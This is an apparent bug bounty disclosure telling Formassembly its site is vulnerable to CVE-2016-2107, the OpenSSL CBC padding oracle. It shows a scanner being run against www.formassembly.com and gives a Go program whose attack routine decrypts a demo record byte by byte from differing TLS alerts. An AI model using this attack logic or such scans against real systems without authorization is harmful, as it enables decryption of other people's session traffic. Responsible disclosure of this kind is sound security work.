Dear Formassembly bug bounty team,
formassembly.com is vulnerable to CVE-2016-2107, allowing remote attackers to obtain sensitive information via padding-oracle attacks.
$ git clone https://github.com/FiloSottile/CVE-2016-2107.git
$ cd CVE-2016-2107
$ go run main.go www.formassembly.com
... Vulnerable: true
The tool sends a crafted CBC record and checks which TLS alert the server answers with: record_overflow (OpenSSL's internal DATA_LENGTH_TOO_LONG error; vulnerable) or bad_record_mac (not vulnerable).
Filippo Valsorda, the author of the tool I used to discover this issue, wrote a fantastic article on CVE-2016-2107 here: https://blog.cloudflare.com/yet-another-padding-oracle-in-openssl-cbc-ciphersuites/
The flaw is in OpenSSL's AES-NI CBC code path: after decrypting a record it validates the padding before checking that padding plus MAC actually fit inside the record, and the two failures are reported with different alerts. The server therefore tells an attacker whether a chosen ciphertext decrypted to valid padding. A padding-oracle attack uses that single bit over and over, adjusting the preceding ciphertext block one byte at a time, until the plaintext of a captured record is recovered. The attacker needs to be on path (able to capture records and inject modified ones), so the impact is the decryption of session traffic, not remote code execution.
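The following Go program is an added, simplified model of the oracle described above; it is not Filippo's tool and not OpenSSL's code path, and the keys, IV and HTTP-style plaintext are constructed for the demo. The server side (unseal) checks a MAC-then-encrypt CBC record in the vulnerable order (padding first, then a record_overflow alert when padding plus MAC do not fit, then the MAC) or in the fixed order (length bound first, every failure reported as bad_record_mac). HMAC-SHA256 is used so that any two-block record with valid padding trips the length check, which keeps the attacker side short: it recovers one ciphertext block byte by byte purely from which alert comes back, and the same attacker gets nothing from the fixed server.

```go
package main

import (
	"bytes"
	"crypto/aes"
	"crypto/cipher"
	"crypto/hmac"
	"crypto/sha256"
	"errors"
	"fmt"
)

// The two alerts the oracle distinguishes; the attack exists as soon as a peer can tell them apart.
var (
	ErrBadRecordMAC   = errors.New("alert: bad_record_mac")
	ErrRecordOverflow = errors.New("alert: record_overflow")
)

const macLen = sha256.Size // MAC-then-encrypt with HMAC-SHA256

// Constructed demo material; a real TLS session derives keys from the handshake.
var (
	encKey        = []byte("0123456789abcdef")
	macKey        = []byte("constructed-demo-mac-key")
	demoIV        = bytes.Repeat([]byte{0x42}, aes.BlockSize)
	demoPlaintext = []byte("GET /account HTTP/1.1\r\nCookie: sid=0123456789abcdef\r\n")
)

// tlsPad appends TLS-style CBC padding: p+1 bytes, each equal to p.
func tlsPad(b []byte) []byte {
	p := (aes.BlockSize - (len(b)+1)%aes.BlockSize) % aes.BlockSize
	return append(b, bytes.Repeat([]byte{byte(p)}, p+1)...)
}

// seal builds a record IV || CBC(plaintext || HMAC || padding).
func seal(plaintext []byte) []byte {
	mac := hmac.New(sha256.New, macKey)
	mac.Write(plaintext)
	body := tlsPad(mac.Sum(append([]byte{}, plaintext...)))
	blk, _ := aes.NewCipher(encKey)
	out := make([]byte, len(body))
	cipher.NewCBCEncrypter(blk, demoIV).CryptBlocks(out, body)
	return append(append([]byte{}, demoIV...), out...)
}

// unseal checks a record. vulnerable=true mirrors the flawed ordering: padding is validated,
// then the server notices padding plus MAC do not fit and says so with a different alert.
// vulnerable=false bounds the pad length first and reports every failure identically.
// (The real OpenSSL fix is also constant-time; timing is out of scope for this model.)
func unseal(record []byte, vulnerable bool) ([]byte, error) {
	if len(record) < 2*aes.BlockSize || len(record)%aes.BlockSize != 0 {
		return nil, ErrBadRecordMAC
	}
	blk, _ := aes.NewCipher(encKey)
	pt := make([]byte, len(record)-aes.BlockSize)
	cipher.NewCBCDecrypter(blk, record[:aes.BlockSize]).CryptBlocks(pt, record[aes.BlockSize:])
	p := int(pt[len(pt)-1])
	if (!vulnerable && p+1+macLen > len(pt)) || p+1 > len(pt) {
		return nil, ErrBadRecordMAC
	}
	for _, b := range pt[len(pt)-p-1:] {
		if int(b) != p {
			return nil, ErrBadRecordMAC
		}
	}
	if p+1+macLen > len(pt) {
		return nil, ErrRecordOverflow // vulnerable path: reached only when the padding was valid
	}
	body := pt[:len(pt)-p-1]
	msg, tag := body[:len(body)-macLen], body[len(body)-macLen:]
	mac := hmac.New(sha256.New, macKey)
	mac.Write(msg)
	if !hmac.Equal(mac.Sum(nil), tag) {
		return nil, ErrBadRecordMAC
	}
	return msg, nil
}

// recoverBlock recovers the plaintext of ciphertext block target, given its predecessor prev,
// by submitting two-block records prev' || target. Bytes come out last-first: the known tail is
// forced to the pad value t, so the padding validates only if byte i also decrypts to t.
func recoverBlock(prev, target []byte, paddingOK func([]byte) bool) ([]byte, bool) {
	known := make([]byte, aes.BlockSize)
	forged := make([]byte, aes.BlockSize)
	for i := aes.BlockSize - 1; i >= 0; i-- {
		t := byte(aes.BlockSize - 1 - i) // pad value whose p+1 bytes cover positions i..15
		copy(forged, prev)
		for j := i + 1; j < aes.BlockSize; j++ {
			forged[j] = prev[j] ^ known[j] ^ t
		}
		found := false
		for x := 0; x < 256 && !found; x++ {
			forged[i] = byte(x)
			if !paddingOK(append(append([]byte{}, forged...), target...)) {
				continue
			}
			if i == aes.BlockSize-1 {
				// A pad value p>0 also passes when the real byte 14 equals p; flipping byte 14
				// rules that out, since p=0 checks only byte 15.
				probe := append([]byte{}, forged...)
				probe[i-1] ^= 0x01
				if !paddingOK(append(probe, target...)) {
					continue
				}
			}
			known[i] = byte(x) ^ prev[i] ^ t // P[i] = D[i] ^ prev[i], and D[i] ^ x == t
			found = true
		}
		if !found {
			return nil, false
		}
	}
	return known, true
}

// Demo attacks block 1 (plaintext bytes 16..31) of a sealed record against either server.
func Demo(vulnerable bool) ([]byte, bool) {
	record := seal(demoPlaintext) // IV | C0 | C1 | ... ; C1 encrypts plaintext[16:32]
	oracle := func(r []byte) bool { _, err := unseal(r, vulnerable); return err == ErrRecordOverflow }
	return recoverBlock(record[16:32], record[32:48], oracle)
}

func main() {
	for _, v := range []bool{true, false} {
		got, ok := Demo(v)
		fmt.Printf("vulnerable=%v recovered=%v block=%q\n", v, ok, got)
	}
}
```

Against the vulnerable server the attacker needs at most 256 queries per byte and never sees a successful decryption; the only thing it consumes is the difference between the two alerts. Against the fixed server the oracle never fires and the attack aborts on the first byte.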
While I am at it, I may as well let you know that you also support 1024-bit Diffie-Hellman keys. I would recommend using a 2048-bit Diffie-Hellman group.
Link to GitHub repo: https://github.com/FiloSottile/CVE-2016-2107
Link to online test: https://filippo.io/CVE-2016-2107/
Yours sincerely,
Ed